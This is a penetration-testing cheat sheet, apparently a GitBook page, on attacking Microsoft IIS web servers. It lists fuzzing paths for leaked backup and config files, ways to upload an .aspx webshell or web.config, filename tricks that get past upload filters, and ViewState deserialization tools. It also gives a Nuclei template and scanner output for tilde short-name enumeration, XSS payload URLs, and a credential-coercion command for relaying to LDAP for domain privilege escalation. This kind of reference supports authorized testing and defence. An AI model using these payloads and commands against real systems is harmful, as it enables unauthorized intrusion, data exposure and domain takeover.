IIS

Fuzzing

/trace.axd
/trace.axd?id=1
/admin/help.cgi
/admin/help.cgi.bak
/admin/WS_FTP.LOG
/adovbs.inc
/confirm.asp.bak 
/default.asp.bak
/login.asp.bak
/pindex.asp.bak
/rootlogin.asp.bak
/rootlogin.asp.old
/_vti_pvt/service.cnf 
/include/common.inc
/WS_FTP.LOG
/service.cnf
/_vti_pvt/service.cnf
/aspnet_client
/global.asax

Wordlists

payloads/iis.txt at main · coffinxp/payloadsGitHub

payloads/aspx.txt at main · coffinxp/payloadsGitHub

GitHub - reewardius/iis-pentestGitHub

fuzzlists/Discovery/iisfinal.txt at main · nu11pointer/fuzzlistsGitHub

trace.axd enable

Information leak

Information disclosure

Try

target.com/><img>

Often discloses info.

PUT methode enabled

Try uploading .aspx webshell or web.config

Insecure Upload File

Try to upload web.config

Upload a web.config File for Fun & ProfitSoroush Dalili (@irsdl) Blog

Uploading web.config for Fun and Profit 2Soroush Dalili (@irsdl) Blog

Website using PHP

It is possible to use “filename=”web<<“” in the file upload request. If “web**” replaces another file in the same directory (for example web.aspx), another combination can be used such as “filename=”web<<>fig”” or “filename=’web”config’”.

File Upload and PHP on IIS: >=? and <=* and "=.Soroush Dalili (@irsdl) Blog

web.config or web.xml

https://x.x.x.x/.//WEB-INF/web.config
https://x.x.x.x/.//WEB-INF/web.xml

Viewstate

GitHub - 0xacb/viewgen: viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keysGitHub

Exploiting ViewState Deserialization using Blacklist3r andNotSoSecure

Internal IP disclosure

> curl -v --http1.0 http://example.com

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Tilde Enumeration

http://example.com/~a
http://example.com/~b
http://example.com/~c
...

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory with a short name beginning with "s"

http://example.com/~se
http://example.com/~sf
http://example.com/~sg
...

Once the short name secret~1 is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents

http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

http://example.com/secret~1/somefi~1.txt

If two files named somefile.txt and somefile1.txt exist in the same directory, their 8.3 short file names would be:

somefi~1.txt for somefile.txt
somefi~2.txt for somefile1.txt

IIs Tilde Enumration Scanner - Burp Extension

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml

id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:

    - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    - |
       DEBUG /*~1*/a.aspx HTTP/1.1
       Host: {{Hostname}}
       Origin: {{BaseURL}}
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"

ShortScan

GitHub - bitquark/shortscan: An IIS short filename enumeration toolGitHub

shortscan http://yourtarget.com -F

IIS ShortName Scanner

GitHub - irsdl/IIS-ShortName-Scanner: latest version of scanners for IIS short filename (8.3) disclosure vulnerabilityGitHub

java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, necessitating the brute-forcing of the remaining filename.

Or:

GitHub - lijiejie/IIS_shortname_Scanner: an IIS shortname ScannerGitHub

# python iis_shortname_scan.py http://target

Generate Wordlist

egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt

Fuzzing

gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp

XSS

http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx

http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx

See XSS Page - ASP part

XSS

Resources

How to find bugs in Microsoft iis page.InfoSec Write-ups

ASP.NET Microsoft IIS PentestingMedium

IIS | Pentest Book

GitHub - reewardius/iis-pentestGitHub

Script to configure IIS

Privilege Escalation

To get an HTTP coerce of the machine account

powershell iwr http://192.168.56.1 -UseDefaultCredentials

than relay to Ldap and :

start_tls + add a computer to the domain + RBCD or
shadow credentials

Example with RBCD :

Shell as admin:

Credit: M4fly

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

PreviousNginx NextExchange / OWA

Last updated 1 month ago